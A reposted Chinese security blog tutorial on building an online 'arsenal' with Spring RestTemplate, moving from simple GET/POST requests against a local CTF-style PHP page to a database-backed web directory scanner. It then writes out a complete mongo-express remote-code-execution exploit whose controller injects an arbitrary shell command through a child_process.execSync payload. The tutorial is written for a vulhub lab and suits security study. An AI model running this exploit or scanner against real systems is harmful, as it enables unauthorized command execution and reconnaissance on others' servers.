编写基于RestTemplate的—在线武器库

admin 2022年2月3日11:16:39评论61 views字数 6442阅读21分28秒阅读模式

编写基于RestTemplate的—在线武器库

扫一扫关注公众号,长期致力于安全研究编写基于RestTemplate的—在线武器库

前言:本文作者Met32,转载与Freebuf



0x01 前言

  最近在接触到分布式方面知识的时候,学习了RestTemplate的一些使用。RestTemplate比较常见的就是用来进行一些http请求。本人在使用之后,在语法简洁的同时,感觉非常的方便。

于是乎在后面就想到了,通过RestTemplate来做成在线的"武器库",会不会更方便呢。因为Springboot开发本来就比较简单,而且在后期进行一些团队协作的时候,用在线的平台是不是相对于团队更方便?避免了因为环境不一致而造成的问题。


0x02 Resttemplate get请求及传参

    2.1正常get请求不带参

   首先来用一下正常不带参的请求,既然要使用RestTemplate,那么肯定首先要new出来。之后使用rest.exchange进行请求。

exchange参数说明如下:

url:请求路径
method:请求的方法(GET、POST、PUT等)
requestEntity:HttpEntity对象,封装了请求头和请求体
responseType:返回数据类型
uriVariables:支持PathVariable类型的数据。

参数1,2不做过多讲解,参数3的话,在初始化HttpEntity的时候,就可以传入一个自定义的headers。所以提前通过HttpHeaders headers = new HttpHeaders();进行设置headers并传入即可。

@RequestMapping("gettest")public @ResponseBody String param(){RestTemplate rest = new RestTemplate();HttpHeaders headers = new HttpHeaders();
headers.set("user-agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36");
String url = "http://127.0.0.1/t.php";ResponseEntity<String> res = rest.exchange(url, HttpMethod.GET,new HttpEntity<> (null,headers),String.class);
String body = res.getBody();return body;}

在上方的代码中,请求的是一个php文件,而该php文件非常简单,只是打印出user_agent。

编写基于RestTemplate的—在线武器库

在打印出user_agent之后,ResponseEntity<String> res这儿就接收到了回显信息,最后在通过res.getBody();成功获取到页面的回显数据

编写基于RestTemplate的—在线武器库

2.2 get请求带参使用

了解完上面的无参get请求之后,接下来了解一下如何传参?

是不是感觉有点枯燥了?为此加了点CTF元素。代码如下,只有当用户传参符合第四行的if判断,才会进行输出正确的flag

编写基于RestTemplate的—在线武器库

传参方式:

这种也是最为常见的一种,就是使用参数接收,是不是感觉和上方无参get方式的代码非常相似?下方形参agent和value就是在网页中的参数名(PS:学过springboot的小伙伴应该都知道)。之后将agent设置到headers里面,而value进行了拼接到t.php?value= 后面进行当做参数值传入

public @ResponseBody String param(String agent,String value){        RestTemplate rest = new RestTemplate();        HttpHeaders headers = new HttpHeaders();        headers.set("user-agent",agent);        String url = "http://127.0.0.1/t.php?value="+value;        ResponseEntity<String> res = rest.exchange(url, HttpMethod.GET,new HttpEntity<>(null,headers),String.class);        String body = res.getBody();        return body;    }

最后进行测试一下,成功进行传参获取到了“flag”

编写基于RestTemplate的—在线武器库

2.3 编写在线目录扫描脚本

 既然玩转了get请求之后,那就来做一个目录扫描的小功能吧。毕竟学以致用。

   整体实现流程如下,采用springboot,并整合mybatis。这里没有写Service层,因为毕竟都是初步实现而已。

而最为显著的一个优点就是:站点目录都会存入到数据库中,这就在后期发展中避免了字典少,不够用的问题。因为团队成员都可以将自己的字典存入到该数据库中。

编写基于RestTemplate的—在线武器库

首先准备好数据库和一些"字典",测试阶段,本人自己就手动添加了几个。后续如果字典庞大,可自己写个小脚本导入到数据库即可。

编写基于RestTemplate的—在线武器库

数据库准备好之后,就可以进行整合mybatis了。这里pom文件需要加载mybatis和mysql的依赖。

目录结构如下:一个Controller,一个mapper和xml配置文件,以及一个用来存储的类

编写基于RestTemplate的—在线武器库

application主配置文件,主要用来写一些数据库配置

server.port=8081spring.datasource.username=rootspring.datasource.password=rootspring.datasource.url=jdbc:mysql://localhost:3306/tance?useSSL=false&useUnicode=true&characterEncoding=utf-8mybatis.mapper-locations=classpath:Mapper/*.xml

Mapper代码如下,记得要加上@Mapper注解

@Mapperpublic interface MuluMapper {    List<catalogue> selectAll();}

Mapper.xml配置,用来查询数据库中的 "字典"

<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE mapper        PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN"        "http://mybatis.org/dtd/mybatis-3-mapper.dtd"><mapper namespace="com.example.restclien.Dao.MuluMapper"><select id="selectAll" resultType="com.example.restclien.Dao.catalogue">        select * from catalogue    </select></mapper>

既然配置好之后,那就开始实现重要功能点了!代码简单讲解一下:首先通过@Autowired把mapper自动注入。之后List<catalogue> list = muluMapper.selectAll();会到mapper.xml中执行select查询语句,并将其保存到List集合中。最后到for循环中进行循环遍历过程中,将url与获取的数据库中的name字段内容拼接保存到temp这个临时变量。

举个例子:

用户输入url为http://127.0.0.1

name字段第一个内容为:admin

那么最终 temp=http://127.0.0.1/admin

拼接完成之后,通过exchange访问,最终res.getStatusCodeValue()获取响应码,为200的话,就判定该文件存在。(PS:这里判断的比较潦草,比如403等情况没有进行判断)

@RestControllerpublic class MapperController {    @Autowired    MuluMapper muluMapper;    @RequestMapping("/tance")    public String tance(String url) {        RestTemplate rest = new RestTemplate();        HttpHeaders headers = new HttpHeaders();        List<String> lists = new ArrayList<>();        headers.set("user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36");        List<catalogue> list = muluMapper.selectAll();        if(!url.endsWith("/")){            url+="/";        }
for (catalogue tance : list) { String temp = url+tance.getName(); try{ ResponseEntity<String> res = rest.exchange(temp, HttpMethod.GET,new HttpEntity<>(null,headers),String.class); lists.add("目录存在:"+temp+" 响应状态码为:"+res.getStatusCodeValue()); }catch(Exception e){ e.printStackTrace(); }
} return lists.toString(); }}

看一下最终成品吧,成功实现一款简易的在线web目录扫描

编写基于RestTemplate的—在线武器库

编写基于RestTemplate的—在线武器库


0x03 Resttemplate POST请求

有了上面的思路之后,post也类似。那么为了防止大家感觉枯燥,继续来玩这道"CTF"

php的代码没有太大变动,只是请求换成了post

编写基于RestTemplate的—在线武器库

RestTemplate代码如下:传参将agent设置到headers里面,而value添加到了LinkedMultiValueMap中,可以理解为这个LinkedMultiValueMap就是用来存储post要提交的数据,而最后这个稍作不同的是,用的restTemplate.postForEntity()进行post提交数据即可,与get是非常类似的。

@RequestMapping("/Post01")    public @ResponseBody    String Post01(String agent,String value){        RestTemplate restTemplate = new RestTemplate();        HttpHeaders headers = new HttpHeaders();        headers.set("user-agent",agent);        String url = "http://127.0.0.1/t.php";        LinkedMultiValueMap params = new LinkedMultiValueMap();        params.add("value",value);        ResponseEntity<String> str = restTemplate.postForEntity(url,new HttpEntity<>(params,headers),String.class);        return str.getBody();    }

最后传参即可,dong的一下,“flag”也就出现了

编写基于RestTemplate的—在线武器库

3.2 mongo-express 远程代码执行漏洞脚本编写

靶场安装直接去vulhub下载即可。安装过程很简单,启动之后

编写基于RestTemplate的—在线武器库

漏洞利用过程更为简单execSync中输入要执行的命令即可。返回Valid表示执行成功了。

编写基于RestTemplate的—在线武器库

之后前往docker查看即可,发现成功创建1.txt

编写基于RestTemplate的—在线武器库

接下来编写利用脚本

先准备一个比较丑的前端页面,存到static目录中,这是Springboot默认存放静态资源的地方。

<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <title>mongo-express 远程代码执行漏洞</title></head><body><form action="/exec" method="post">    请输入漏洞URL:<input type="text" name="url"/><br/>    请输入要执行的命令:<input type="text" name="command"/>    <input type="submit" value="提交"></form></body></html>

Controller编写思路,首先可以看到action提交到了exec,所以RequestMapping写成exec即可,参数的话,一个url用来接收url地址的,一个command用来接收命令。

编写基于RestTemplate的—在线武器库

完整Controller如下,笔者带你进一步分析:在paramMap.add语句中,可以看到对输入进来command进行了拼接,假设笔者这里输入的为“ls”,从而构成了如下数据

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ls")



最后使用的exchange方法进行的POST提交,提交的URL为笔者传入的,而command传入并拼接进去之后,数据最终存到了httpEntity中,,而这里的参数就不做过多讲解,因为有了前面的基础,应该都能一看懂什么意思。

@RequestMapping("/exec")    public @ResponseBody String Post01(String url,String command){        RestTemplate restTemplate = new RestTemplate();        HttpHeaders headers = new HttpHeaders();        headers.set("user-agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");        MultiValueMap<String, String> paramMap = new LinkedMultiValueMap<String, String>();        paramMap.add("document", "this.constructor.constructor("return process")().mainModule.require("child_process").execSync("+"""+command+"""+")");        HttpEntity<MultiValueMap<String, String>> httpEntity = new HttpEntity<MultiValueMap<String, String>>(paramMap,headers);        ResponseEntity<String> response = null;        try {            response = restTemplate.exchange(url,HttpMethod.POST,httpEntity, String.class);        }catch(NullPointerException e){            e.printStackTrace();        }        return response.getBody();    }

最终测试过程,编写脚本利用成功

编写基于RestTemplate的—在线武器库

编写基于RestTemplate的—在线武器库

编写基于RestTemplate的—在线武器库



11111
微信搜索关注 "安全族" 长期致力于安全研究


下方扫一下扫,即可关注编写基于RestTemplate的—在线武器库

编写基于RestTemplate的—在线武器库








原文始发于微信公众号(安全族):编写基于RestTemplate的—在线武器库

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月3日11:16:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   编写基于RestTemplate的—在线武器库http://cn-sec.com/archives/764831.html

发表评论

匿名网友 填写信息